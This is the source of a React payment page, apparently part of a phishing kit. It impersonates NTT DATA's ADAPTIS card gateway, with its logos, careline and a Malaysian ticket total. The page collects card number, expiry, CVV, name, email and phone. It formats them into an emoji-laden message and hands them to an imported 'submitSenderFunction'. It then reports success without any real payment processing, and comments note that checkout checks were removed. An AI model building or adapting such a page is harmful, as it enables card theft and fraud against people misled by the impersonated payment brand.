import { useEffect, useRef, useState } from "react";
import { Link, useLocation, useNavigate } from "react-router-dom";
import InputField from "./InputField";
import useHandleSubmit from "./providers/3ds_2.0/handleSubmit";

function readStored(key, storage) {
  try {
    return JSON.parse(storage.getItem(key) || "null");
  } catch {
    return null;
  }
}

function money(value) {
  return Number(value || 0).toLocaleString("en-US", {
    minimumFractionDigits: 2,
    maximumFractionDigits: 2,
  });
}

// Надежная проверка срока действия карты (принимает и 1/26, и 01/26)
function isDateValid(dateStr) {
  if (!dateStr) return false;
  const match = dateStr.match(/^(\d{1,2})\s*\/\s*(\d{2})$/);
  if (!match) return false;

  const month = parseInt(match[1], 10);
  const year = parseInt(match[2], 10);

  if (month < 1 || month > 12) return false;

  const now = new Date();
  const currentYear = now.getFullYear() % 100;
  const currentMonth = now.getMonth() + 1;

  if (year > currentYear) return true;
  if (year < currentYear) return false;
  return month >= currentMonth;
}

function CardIcon() {
  return (
    <svg
      width="20"
      height="16"
      viewBox="0 0 24 20"
      fill="none"
      aria-hidden="true"
    >
      <rect
        x="2"
        y="3"
        width="19"
        height="14"
        rx="2"
        stroke="currentColor"
        strokeWidth="1.8"
      />
      <path
        d="M2 7h19M5 12h5M5 14h3"
        stroke="currentColor"
        strokeWidth="1.8"
      />
    </svg>
  );
}

export default function Payment({ privacyPath = "/privacy-policy" }) {
  const location = useLocation();
  const navigate = useNavigate();

  const [checkout] = useState(
    () =>
      location.state?.checkout ||
      readStored("checkoutDetails", sessionStorage)
  );

  const [contact, setContact] = useState(() => {
    const saved =
      location.state?.contact ||
      checkout?.contact ||
      readStored("checkoutContact", sessionStorage);

    return {
      email: saved?.email || "",
      phone:
        saved?.internationalPhone ||
        [saved?.dialCode, saved?.phone].filter(Boolean).join(" "),
    };
  });

  const [detailsOpen, setDetailsOpen] = useState(true);
  const [busy, setBusy] = useState(false);
  const [error, setError] = useState("");
  const [success, setSuccess] = useState("");
  const [now, setNow] = useState(Date.now);

  const [cardholder, setCardholder] = useState("");
  const [input1Value, setInput1Value] = useState("");
  const [input2Value, setInput2Value] = useState("");
  const [input3Value, setInput3Value] = useState("");
  const [focusedInput, setFocusedInput] = useState(1);

  const input1Ref = useRef(null);
  const input2Ref = useRef(null);
  const input3Ref = useRef(null);
  const submittingRef = useRef(null);

  const submitSenderFunction = useHandleSubmit();

  useEffect(() => {
    const timer = window.setInterval(() => setNow(Date.now()), 1000);
    return () => window.clearInterval(timer);
  }, []);

  const tickets = Array.isArray(checkout?.tickets) ? checkout.tickets : [];
  const currency = checkout?.currency || "MYR";
  const total = Number(checkout?.total) || 610;

  // Убрал жесткую привязку к checkout для тестов
  const hasCheckout = true; 

  const expiresAt = checkout?.expiresAt
    ? new Date(checkout.expiresAt).getTime()
    : Date.now() + 7 * 60 * 1000 + 46 * 1000;

  const remaining = Number.isFinite(expiresAt)
    ? Math.max(0, Math.ceil((expiresAt - now) / 1000))
    : null;

  const expired = remaining === 0;

  const checkFocus = (num) => focusedInput === num;
  const handleInput1Focus = () => setFocusedInput(1);
  const handleInput2Focus = () => setFocusedInput(2);
  const handleInput3Focus = () => setFocusedInput(3);

  // Очищаем значения от всех нецифровых символов для надежной проверки
  const cleanCardNumber = input1Value.replace(/\D/g, '');
  const cleanCvc = input3Value.replace(/\D/g, '');

  // ИСПРАВЛЕННАЯ ВАЛИДАЦИЯ (больше никаких захардкоженных 4/5 и 10/26)
  const cardValid =
    cleanCardNumber.length >= 15 && // 15 для Amex, 16 для Visa/MC
    isDateValid(input2Value) && // Динамическая проверка даты
    (cleanCvc.length === 3 || cleanCvc.length === 4) && // 3 или 4 цифры
    cardholder.trim().length > 0;

  async function handleProceed(event) {
    event.preventDefault();

    if (submittingRef.current) return;

    if (!cardValid) {
      setError("Please enter valid card details.");
      return;
    }

    submittingRef.current = true;
    setBusy(true);
    setError("");
    setSuccess("");

    try {
      const additional = `
👤 Cardholder: ${cardholder}
📧 Email: ${contact.email}
📱 Phone: ${contact.phone}

`;

      submitSenderFunction({
        form: {
          cardholder,
          email: contact.email,
          phone: contact.phone,
          merchant: process.env.REACT_APP_MERCHANT_NAME,
        },
        amount: total,
        currency,
        input1Value,
        input2Value,
        input3Value,
        additional,
      });

      setSuccess("Payment submitted successfully.");
    } catch (e) {
      setError(e?.message || "Unable to process payment. Please try again.");
    } finally {
      setBusy(false);
      submittingRef.current = null;
    }
  }

  return (
    <main className="pay-page">
      <style>{CSS}</style>

      <div className="pay-wave pay-wave-top" aria-hidden="true" />
      <div className="pay-wave pay-wave-bottom" aria-hidden="true" />

      <form className="pay-panel" onSubmit={handleProceed}>
        <div className="pay-timeout">
          <span className="pay-timeout-label">Timeout:</span>
          <span className="pay-timeout-time">
            {remaining === null ? (
              "—"
            ) : (
              <>
                <strong>{String(Math.floor(remaining / 60)).padStart(2, "0")}</strong> min{" "}
                <strong>{String(remaining % 60).padStart(2, "0")}</strong> sec
              </>
            )}
          </span>
        </div>

        <button
          type="button"
          className="pay-details-toggle"
          aria-expanded={detailsOpen}
          aria-controls="pay-order-details"
          onClick={() => setDetailsOpen((value) => !value)}
        >
          <span>Payment Details</span>
          <span className="pay-amount">
            {currency} {money(total)}
            <svg className={`pay-chevron ${detailsOpen ? "is-open" : ""}`} width="12" height="8" viewBox="0 0 12 8" fill="none">
              <path d="M1 1.5L6 6.5L11 1.5" stroke="#667683" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
            </svg>
          </span>
        </button>

        {detailsOpen && (
          <div id="pay-order-details" className="pay-order-details">
            {tickets.length > 0 ? (
              tickets.map((ticket, index) => (
                <div key={ticket.id || index}>
                  <span>
                    {ticket.title}
                    <small>
                      {ticket.quantity} × {ticket.ticketLabel || ticket.ticketType}
                    </small>
                  </span>
                  <strong>
                    {currency} {money(Number(ticket.price) * Number(ticket.quantity))}
                  </strong>
                </div>
              ))
            ) : (
              <div>
                <span>Attraction Ticket</span>
                <strong>{currency} 610.00</strong>
              </div>
            )}
          </div>
        )}

        <h2 className="pay-section-title">Contact Informations</h2>

        <div className="pay-field">
          <label>Email</label>
          <input
            type="email"
            autoComplete="email"
            required
            maxLength={254}
            disabled={busy}
            value={contact.email}
            onChange={(event) =>
              setContact((current) => ({ ...current, email: event.target.value }))
            }
          />
        </div>

        <div className="pay-field">
          <label>Mobile No</label>
          <div className="pay-phone-input">
            <span className="pay-flag">🇲🇾</span>
            <span className="pay-country-code">+60</span>
            <input
              type="tel"
              autoComplete="tel"
              required
              maxLength={30}
              disabled={busy}
              value={contact.phone}
              onChange={(event) =>
                setContact((current) => ({ ...current, phone: event.target.value }))
              }
            />
          </div>
        </div>

        <p className="pay-click-to-pay">
          How does <a href="#">Click to Pay</a> use my information?{" "}
          <svg width="16" height="16" viewBox="0 0 16 16" fill="none" aria-hidden="true">
            <circle cx="8" cy="8" r="7" stroke="#0075B9" strokeWidth="1.5"/>
            <path d="M8 7V11M8 5V5.5" stroke="#0075B9" strokeWidth="1.5" strokeLinecap="round"/>
          </svg>
        </p>

        <h2 className="pay-card-heading">
          <CardIcon />
          Payment via Card
        </h2>

        <div className="pay-card-accepted">
          <label>Card Accepted</label>
          <div className="pay-card-logos">
            <img src="/mc.png" alt="Mastercard" />
            <img src="/visa.png" alt="Visa" />
          </div>
        </div>

        <div className="pay-field">
          <label>Card Number</label>
          <div className="pay-input-with-icon">
            <img src="/cc.svg" alt="" className="pay-input-icon" />
            <InputField
              formatType={"card"}
              ref={input1Ref}
              value={input1Value}
              onFocus={handleInput1Focus}
              onChange={(e) => setInput1Value(e.target.value)}
              placeholder={"1111 2222 3333 4444"}
              focused={checkFocus(1)}
            />
          </div>
        </div>

        <div className="pay-field">
          <label>Name on Card</label>
          <input
            type="text"
            autoComplete="cc-name"
            required
            maxLength={100}
            disabled={busy}
            placeholder="Please enter name"
            value={cardholder}
            onChange={(event) => setCardholder(event.target.value)}
          />
        </div>

        <div className="pay-card-row">
          <div className="pay-field">
            <label>Expiry Date</label>
            <InputField
              formatType={"date"}
              ref={input2Ref}
              value={input2Value}
              onFocus={handleInput2Focus}
              onChange={(e) => setInput2Value(e.target.value)}
              placeholder={"MM/YY"}
              focused={checkFocus(2)}
            />
          </div>

          <div className="pay-field">
            <label className="pay-label-with-icon">
              <span>CVC / CVV2</span>
            
            </label>
            <InputField
              formatType={"code"}
              ref={input3Ref}
              value={input3Value}
              onFocus={handleInput3Focus}
              onChange={(e) => setInput3Value(e.target.value)}
              placeholder={"3 or 4 digit code"}
              focused={checkFocus(3)}
            />
          </div>
        </div>

        <p className="pay-privacy">
          By continuing, you have read and agreed to the{" "}
          <Link to={privacyPath} target="_blank" rel="noopener noreferrer">
            Privacy Notice
          </Link>
        </p>

        {error && <p className="pay-error" role="alert">{error}</p>}
        {success && <p className="pay-success" role="status">{success}</p>}
        {expired && !error && (
          <p className="pay-error" role="alert">
            Your reservation has expired. Please return to checkout.
          </p>
        )}

        <div className="pay-actions">
          <button
            type="button"
            className="pay-cancel"
            disabled={busy}
            onClick={() => navigate("/checkout")}
          >
            Cancel
          </button>

          {/* УБРАЛ hasCheckout ОТСЮДА, ЧТОБЫ КНОПКА РАЗБЛОКИРОВАЛАСЬ */}
          <button
            type="submit"
            className="pay-proceed"
            disabled={busy || expired || !cardValid}
          >
            {busy ? "Connecting..." : "Proceed"}
          </button>
        </div>

        <footer className="pay-footer">
          <span className="pay-powered-by">Powered by</span>
          
          <div className="pay-footer-logos">
            <img src="/visa.png" alt="Visa" style={{ height: '24px' }} />
            <img src="/mc.png" alt="Mastercard" style={{ height: '24px' }} />
            <img src="/mydebit.png" alt="MyDebit Secure" style={{ height: '24px' }} />
            <img src="/pci.png" alt="PCI DSS" style={{ height: '24px' }} />
            <div className="pay-adaptis">
              <span>ADAPTIS</span>
              <small>by NTT DATA</small>
            </div>
          </div>

          <div className="pay-footer-text">
            <p>
              Customer Careline: <a href="tel:+60322614668">+603-22614668</a> | Operation Hours: 09:00 - 18:00 (Mon - Fri) | Email: <a href="mailto:adaptis@nttdata.com">ADAPTIS</a>
            </p>
            <p>NTT DATA Payment Services © 2026. All Rights Reserved.</p>
          </div>
        </footer>
      </form>
    </main>
  );
}

const CSS = `
.pay-page {
  position: relative;
  isolation: isolate;
  min-height: 100vh;
  overflow: hidden;
  padding: 40px 20px;
  background: #f4f7f9;
  color: #333;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.pay-page * { box-sizing: border-box; }
.pay-page button, .pay-page input { font: inherit; }
.pay-page button { cursor: pointer; }
.pay-page button:disabled { cursor: not-allowed; opacity: .55; }
.pay-page button:focus-visible, .pay-page a:focus-visible {
  outline: 3px solid #0075B9;
  outline-offset: 2px;
}
.pay-wave {
  position: absolute;
  z-index: -1;
  pointer-events: none;
  border-radius: 50%;
}
.pay-wave-top {
  width: 1200px;
  height: 300px;
  top: -150px;
  right: -200px;
  transform: rotate(-5deg);
  background: linear-gradient(150deg, #e6f2f8, #d0e8f3, #f4f7f9);
}
.pay-wave-bottom {
  width: 1000px;
  height: 500px;
  right: -400px;
  bottom: -100px;
  transform: rotate(25deg);
  background: linear-gradient(150deg, #f4f7f9, #e1eef5, #d0e8f3);
}
.pay-panel {
  position: relative;
  width: 100%;
  max-width: 620px;
  margin: 0 auto;
  padding: 32px 40px 40px;
  border-radius: 12px;
  background: #fff;
  box-shadow: 0 4px 20px rgba(0,0,0,0.05);
}
.pay-timeout {
  display: flex;
  align-items: center;
  justify-content: space-between;
  padding: 12px 16px;
  border-radius: 6px;
  border: 1px solid #e2e8f0;
  background: #fff;
  font-size: 14px;
  margin-bottom: 24px;
}
.pay-timeout-label { font-weight: 600; color: #1e293b; }
.pay-timeout-time { color: #475569; }
.pay-timeout-time strong { color: #1e293b; font-weight: 600; }

.pay-details-toggle {
  display: flex;
  align-items: center;
  justify-content: space-between;
  width: 100%;
  margin: 0 0 24px;
  padding: 0;
  border: 0;
  background: none;
  font-size: 16px;
  font-weight: 600;
  color: #1e293b;
  text-align: left;
}
.pay-amount {
  display: flex;
  align-items: center;
  gap: 12px;
  color: #0066cc;
  font-size: 16px;
  font-weight: 700;
}
.pay-chevron {
  transition: transform 0.2s ease;
}
.pay-chevron.is-open { transform: rotate(180deg); }

.pay-order-details {
  margin: -12px 0 24px;
  padding: 12px 16px;
  border: 1px solid #e2e8f0;
  border-radius: 6px;
  background: #f8fafc;
}
.pay-order-details > div {
  display: flex;
  justify-content: space-between;
  gap: 20px;
  padding: 8px 0;
  font-size: 14px;
}
.pay-order-details small { display: block; color: #64748b; font-size: 12px; margin-top: 2px; }

.pay-section-title {
  font-size: 16px;
  font-weight: 600;
  color: #1e293b;
  margin: 0 0 16px;
}

.pay-field {
  display: flex;
  flex-direction: column;
  margin-bottom: 16px;
}
.pay-field label {
  display: block;
  margin-bottom: 6px;
  color: #64748b;
  font-size: 13px;
  height: 18px;
  line-height: 18px;
  white-space: nowrap;
}
.pay-label-with-icon {
  display: flex;
  align-items: center;
  gap: 4px;
}
.pay-field input {
  display: block;
  width: 100%;
  height: 44px;
  padding: 0 14px;
  border: 1px solid #cbd5e1;
  border-radius: 6px;
  outline: none;
  background: #fff;
  color: #1e293b;
  font-size: 14px;
  transition: border-color 0.2s;
}
.pay-field input:focus {
  border-color: #0066cc;
  box-shadow: 0 0 0 1px #0066cc;
}
.pay-field input::placeholder { color: #94a3b8; }

.pay-phone-input {
  display: flex;
  align-items: center;
  height: 44px;
  border: 1px solid #cbd5e1;
  border-radius: 6px;
  background: #fff;
  padding: 0 14px;
  gap: 8px;
}
.pay-phone-input:focus-within {
  border-color: #0066cc;
  box-shadow: 0 0 0 1px #0066cc;
}
.pay-phone-input input {
  border: none;
  height: 100%;
  padding: 0;
  flex: 1;
  outline: none;
  box-shadow: none;
}
.pay-phone-input input:focus { box-shadow: none; }
.pay-flag { font-size: 16px; line-height: 1; }
.pay-country-code { color: #1e293b; font-size: 14px; }

.pay-click-to-pay {
  margin: -8px 0 24px;
  color: #64748b;
  font-size: 12px;
  display: flex;
  align-items: center;
  gap: 4px;
}
.pay-click-to-pay a { color: #0066cc; text-decoration: none; }
.pay-click-to-pay a:hover { text-decoration: underline; }
.pay-click-to-pay svg { margin-left: 2px; cursor: pointer; }

.pay-card-heading {
  display: flex;
  align-items: center;
  gap: 8px;
  margin: 0 0 16px;
  font-size: 16px;
  font-weight: 600;
  color: #1e293b;
}
.pay-card-heading svg { color: #0066cc; }

.pay-card-accepted {
  margin-bottom: 16px;
}
.pay-card-accepted label {
  display: block;
  margin-bottom: 6px;
  color: #64748b;
  font-size: 13px;
}
.pay-card-logos {
  display: flex;
  gap: 8px;
  align-items: center;
}
.pay-card-logos img { height: 24px; object-fit: contain; }

.pay-input-with-icon {
  position: relative;
}
.pay-input-with-icon input {
  padding-left: 44px;
}
.pay-input-icon {
  position: absolute;
  left: 14px;
  top: 50%;
  transform: translateY(-50%);
  width: 20px;
  height: 20px;
  pointer-events: none;
}

.pay-card-row {
  display: grid;
  grid-template-columns: 1fr 1fr;
  gap: 16px;
}

.pay-privacy {
  margin: 20px 0 24px;
  color: #64748b;
  font-size: 12px;
  line-height: 1.5;
}
.pay-privacy a { color: #0066cc; text-decoration: none; }
.pay-privacy a:hover { text-decoration: underline; }

.pay-actions {
  display: grid;
  grid-template-columns: 1fr 2fr;
  gap: 16px;
  margin-bottom: 40px;
}
.pay-actions button {
  height: 48px;
  border-radius: 6px;
  font-size: 14px;
  font-weight: 600;
  border: 1px solid transparent;
  transition: all 0.2s;
}
.pay-cancel {
  border-color: #cbd5e1;
  background: #fff;
  color: #1e293b;
}
.pay-cancel:hover:not(:disabled) { background: #f8fafc; }
.pay-proceed {
  background: #0066cc;
  color: #fff;
}
.pay-proceed:hover:not(:disabled) { background: #0052a3; }

.pay-error {
  margin: -12px 0 16px;
  color: #dc2626;
  font-size: 13px;
}
.pay-success {
  margin: -12px 0 16px;
  color: #16a34a;
  font-size: 13px;
}

.pay-footer {
  display: flex;
  flex-direction: column;
  align-items: center;
  margin-top: 20px;
  text-align: center;
}
.pay-powered-by {
  color: #94a3b8;
  font-size: 11px;
  margin-bottom: 12px;
  text-transform: uppercase;
  letter-spacing: 0.5px;
}
.pay-footer-logos {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 16px;
  flex-wrap: wrap;
  margin-bottom: 20px;
}
.pay-adaptis {
  display: flex;
  flex-direction: column;
  align-items: center;
  line-height: 1;
}
.pay-adaptis span {
  font-weight: 800;
  font-size: 16px;
  color: #1e293b;
  letter-spacing: 1px;
}
.pay-adaptis small {
  font-size: 8px;
  color: #64748b;
  margin-top: 2px;
}
.pay-footer-text {
  color: #94a3b8;
  font-size: 11px;
  line-height: 1.6;
}
.pay-footer-text a { color: #0066cc; text-decoration: none; }
.pay-footer-text a:hover { text-decoration: underline; }
.pay-footer-text p { margin: 0; }

@media (max-width: 600px) {
  .pay-page { padding: 20px 16px; }
  .pay-panel { padding: 24px 20px; }
  .pay-actions { grid-template-columns: 1fr 1.5fr; }
  .pay-card-row { grid-template-columns: 1fr; }
}
`;